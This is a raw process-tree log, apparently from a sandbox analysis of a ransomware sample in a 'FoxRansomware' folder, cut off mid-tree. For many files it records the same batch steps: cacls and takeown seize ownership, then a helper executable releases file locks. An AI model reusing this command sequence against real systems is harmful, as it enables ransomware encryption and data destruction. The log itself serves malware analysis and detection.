C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""2⤵PID:5216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C3⤵PID:2236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000011.bin" -nobanner3⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000011.bin" -nobanner4⤵PID:6012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""2⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C3⤵PID:2216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"3⤵PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000006D.bin" -nobanner3⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000006D.bin" -nobanner4⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""2⤵PID:1500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C3⤵PID:5760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"3⤵
- Modifies file permissions
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000006N.bin" -nobanner3⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000006N.bin" -nobanner4⤵PID:3864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "device.png" -nobanner3⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "device.png" -nobanner4⤵PID:5704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:5356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:5892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "tasks.xml" -nobanner3⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "tasks.xml" -nobanner4⤵PID:4696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:4164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:2352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵
- Modifies file permissions
PID:2168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:6084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:5960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:5452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:3980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:1316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""2⤵PID:5980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C3⤵PID:3552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"3⤵
- Modifies file permissions
PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007V.bin" -nobanner3⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007V.bin" -nobanner4⤵PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""2⤵PID:5104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C3⤵PID:5748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"3⤵PID:624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000089.bin" -nobanner3⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000089.bin" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl""2⤵PID:6120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" /E /G Admin:F /C3⤵PID:5932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl"3⤵
- Modifies file permissions
PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" -nobanner3⤵PID:3496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "NotificationUxBroker.f56dfeca-18d0-4e02-b9f9-e296868f1e13.1.etl" -nobanner4⤵PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""2⤵PID:448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C3⤵PID:4684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"3⤵
- Modifies file permissions
PID:4212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000009B.bin" -nobanner3⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000009B.bin" -nobanner4⤵PID:5012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""2⤵PID:612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C3⤵PID:2640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"3⤵PID:5424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000009L.bin" -nobanner3⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000009L.bin" -nobanner4⤵PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""2⤵PID:4136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C3⤵PID:2596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"3⤵
- Modifies file permissions
PID:5052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000A6.bin" -nobanner3⤵PID:4924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000A6.bin" -nobanner4⤵PID:5228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""2⤵PID:5756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"3⤵
- Modifies file permissions
PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000AH.bin" -nobanner3⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000AH.bin" -nobanner4⤵PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5904
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""2⤵PID:5960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C3⤵PID:6044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000B7.bin" -nobanner3⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000B7.bin" -nobanner4⤵PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""2⤵PID:4724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C3⤵PID:2832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"3⤵
- Modifies file permissions
PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000007.bin" -nobanner3⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000007.bin" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""2⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C3⤵PID:4412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin"3⤵PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000L.bin" -nobanner3⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000L.bin" -nobanner4⤵PID:1392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""2⤵PID:4436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin"3⤵PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000V.bin" -nobanner3⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000V.bin" -nobanner4⤵PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:2216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:2856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000006L.bin" -nobanner3⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000006L.bin" -nobanner4⤵PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:5140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:6112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007T.bin" -nobanner3⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007T.bin" -nobanner4⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:4144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵PID:1388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000087.bin" -nobanner3⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000087.bin" -nobanner4⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:3696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:5320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵
- Modifies file permissions
PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000099.bin" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000099.bin" -nobanner4⤵PID:5524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:5908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:3436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000009J.bin" -nobanner3⤵PID:5128
-
